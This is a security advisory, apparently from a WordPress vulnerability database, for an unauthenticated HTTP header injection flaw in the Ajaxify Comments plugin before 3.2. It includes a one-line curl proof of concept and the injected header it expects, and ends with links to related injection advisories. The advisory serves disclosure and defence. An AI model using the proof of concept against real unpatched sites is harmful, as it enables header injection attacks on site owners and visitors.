Ajaxify Comments < 3.2 – Unauthenticated HTTP Header Injection | CVE 2026-2811

Description

The plugin is vulnerable to HTTP Header Injection due to insufficient input sanitization and output escaping on user-supplied data. This makes it possible for unauthenticated attackers to inject arbitrary HTTP headers.

Proof of Concept

`curl -I "http://example.com/?WPACUnapproved=INJECTED_VALUE"`

Expected on vulnerable versions (pre-PHP v8):

`X-WPAC-UNAPPROVED: INJECTED_VALUE`

Affects Plugins

wp-ajaxify-comments

Fixed in 3.2

References

CVE

CVE-2026-2811

Classification

Type

INJECTION

OWASP top 10

A1: Injection

CVSS

5.4 (medium)

Miscellaneous

Original Researcher

Azmi Alsarayrah

Submitter

Azmi Alsarayrah

Submitter website

https://www.linkedin.com/in/azmi-alsarayrah/

Verified

Yes

WPVDB ID

48250628-9b81-4bef-b623-356ceca01215

Timeline

Publicly Published

2026-02-27 (about 1 month ago)

Added

2026-02-27 (about 1 month ago)

Last Updated

2026-02-27 (about 1 month ago)

Other

Published

Title

Published

2020-07-09

Title

Wise Chat < 2.8.4 - CSV Injection

Published

2024-07-17

Title

Cooked Pro < 1.8.0 - Authenticated (Contributor+) HTML Injection

Published

2023-10-20

Title

MainWP Dashboard < 4.5.1.3 - Authenticated(Administrator+) CSS Injection

Published

2026-04-16

Title

Quiz and Survey Master (QSM) < 11.1.1 - Unauthenticated Shortcode Injection

Published

2018-05-01

Title

Form Maker by WD < 1.12.24 - CSV Injection